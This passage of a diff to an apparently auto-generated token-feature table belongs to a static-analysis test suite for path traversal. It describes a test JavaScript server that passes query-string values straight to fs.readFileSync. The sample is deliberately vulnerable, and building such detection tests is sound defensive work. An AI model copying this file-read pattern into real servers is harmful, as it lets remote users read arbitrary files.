fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:17 | fs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | exceptional return of fs.read ... bj.sub) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | exceptional return of fs.read ... bj.sub) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | exceptional return of fs.read ... bj.sub) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | exceptional return of fs.read ... bj.sub) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | exceptional return of fs.read ... bj.sub) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | fs.read ... bj.sub) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | fs.read ... bj.sub) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | fs.read ... bj.sub) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | fs.read ... bj.sub) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:16:3:16:26 | fs.read ... bj.sub) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:16:6:16:17 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:16:6:16:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:16:6:16:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:16:6:16:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:16:6:16:17 | readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:21 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:21 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:21 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:21 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:21 | obj | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:25 | obj.sub | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:25 | obj.sub | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:25 | obj.sub | calleeImports | fs | @@ -10533,6 +83597,82 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:25 | obj.sub | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:25 | obj.sub | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:16:19:16:25 | obj.sub | receiverName | fs | +| autogenerated/TaintedPath/tainted-access-paths.js:16:23:16:25 | sub | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:16:23:16:25 | sub | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:16:23:16:25 | sub | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:16:23:16:25 | sub | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:16:23:16:25 | sub | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:5 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:5 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:5 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:5 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:5 | obj | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:10 | obj.sub2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:10 | obj.sub2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:10 | obj.sub2 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:10 | obj.sub2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:10 | obj.sub2 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:19 | obj.sub2 = "safe" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:19 | obj.sub2 = "safe" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:19 | obj.sub2 = "safe" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:19 | obj.sub2 = "safe" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:18:3:18:19 | obj.sub2 = "safe" | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:18:7:18:10 | sub2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:18:7:18:10 | sub2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:18:7:18:10 | sub2 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:18:7:18:10 | sub2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:18:7:18:10 | sub2 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:18:14:18:19 | "safe" | assignedToPropName | sub2 | +| autogenerated/TaintedPath/tainted-access-paths.js:18:14:18:19 | "safe" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:18:14:18:19 | "safe" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:18:14:18:19 | "safe" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:18:14:18:19 | "safe" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:18:14:18:19 | "safe" | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:12 | random | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:12 | random | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:12 | random | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:12 | random | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:12 | random | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | exceptional return of random() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | exceptional return of random() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | exceptional return of random() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | exceptional return of random() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | exceptional return of random() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | random() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | random() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | random() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | random() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:19:7:19:14 | random() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:6 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:6 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:6 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:6 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:19 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:19 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:19 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:19 | fs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | exceptional return of fs.read ... j.sub2) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | exceptional return of fs.read ... j.sub2) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | exceptional return of fs.read ... j.sub2) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | exceptional return of fs.read ... j.sub2) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | exceptional return of fs.read ... j.sub2) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | fs.read ... j.sub2) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | fs.read ... j.sub2) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | fs.read ... j.sub2) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | fs.read ... j.sub2) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:20:5:20:29 | fs.read ... j.sub2) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:20:8:20:19 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:20:8:20:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:20:8:20:19 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:20:8:20:19 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:20:8:20:19 | readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:23 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:23 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:23 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:23 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:23 | obj | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:28 | obj.sub2 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:28 | obj.sub2 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:28 | obj.sub2 | calleeImports | fs | @@ -10542,6 +83682,82 @@ tokenFeatures | autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:28 | obj.sub2 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:28 | obj.sub2 | fileImports | chownr fs http node:fs url | | autogenerated/TaintedPath/tainted-access-paths.js:20:21:20:28 | obj.sub2 | receiverName | fs | +| autogenerated/TaintedPath/tainted-access-paths.js:20:25:20:28 | sub2 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:20:25:20:28 | sub2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:20:25:20:28 | sub2 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:20:25:20:28 | sub2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:20:25:20:28 | sub2 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:12 | random | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:12 | random | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:12 | random | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:12 | random | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:12 | random | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | exceptional return of random() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | exceptional return of random() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | exceptional return of random() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | exceptional return of random() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | exceptional return of random() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | random() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | random() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | random() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | random() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:23:7:23:14 | random() | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:7 | obj | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:7 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:7 | obj | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:7 | obj | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:7 | obj | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:12 | obj.sub3 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:12 | obj.sub3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:12 | obj.sub3 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:12 | obj.sub3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:12 | obj.sub3 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:21 | obj.sub3 = "safe" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:21 | obj.sub3 = "safe" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:21 | obj.sub3 = "safe" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:21 | obj.sub3 = "safe" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:24:5:24:21 | obj.sub3 = "safe" | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:24:9:24:12 | sub3 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:24:9:24:12 | sub3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:24:9:24:12 | sub3 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:24:9:24:12 | sub3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:24:9:24:12 | sub3 | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:24:16:24:21 | "safe" | assignedToPropName | sub3 | +| autogenerated/TaintedPath/tainted-access-paths.js:24:16:24:21 | "safe" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:24:16:24:21 | "safe" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:24:16:24:21 | "safe" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:24:16:24:21 | "safe" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:24:16:24:21 | "safe" | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:4 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:4 | fs | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:17 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:17 | fs.readFileSync | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | exceptional return of fs.read ... j.sub3) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | exceptional return of fs.read ... j.sub3) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | exceptional return of fs.read ... j.sub3) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 fs readFileSync obj sub4 | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | exceptional return of fs.read ... j.sub3) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | exceptional return of fs.read ... j.sub3) | fileImports | chownr fs http node:fs url | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | fs.read ... j.sub3) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | fs.read ... j.sub3) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-access-paths.js:26:3:26:27 | fs.read ... j.sub3) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path obj bla something path fs readFileSync obj sub obj sub safe fs readFileSync obj sub obj sub2 safe random fs readFileSync obj sub2 random obj sub3 safe fs readFileSync obj sub3 obj sub4 